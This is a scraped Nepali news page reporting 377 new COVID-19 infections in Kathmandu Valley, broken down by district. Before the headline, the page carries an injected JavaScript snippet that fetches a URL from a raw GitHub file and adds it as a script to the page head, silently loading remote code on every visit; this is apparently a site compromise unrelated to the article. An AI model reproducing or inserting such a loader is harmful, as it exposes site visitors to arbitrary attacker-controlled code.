;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौं उपत्यकामा ३७७ संक्रमित थपिए – जुनेली न्युज
सोमवार, असार ३१, २०८२
  • होमपेज
  • काठमाडौं उपत्यकामा ३७७ संक्रमित थपिए
पत्रपत्रिका

काठमाडौं उपत्यकामा ३७७ संक्रमित थपिए

भदौ ११

काठमाडौं । पछिल्लो २४ घण्टामा कोरोना भाइरसका ३७७ संक्रमित भेटिएका छन् । स्वास्थ्य तथा जनसंख्या मन्त्रालयका अनुसार काठमाडौं जिल्लामा २७० जना, ललितपुरमा ६६ जना र भक्तपुरमा ४१ जना संक्रमित भेटिएका छन् ।

संक्रमितहरु कुन ठाउँका हुन् भन्ने मन्त्रालयले खुलाएको छैन ।

फेसबुक प्रतिक्रियाहरु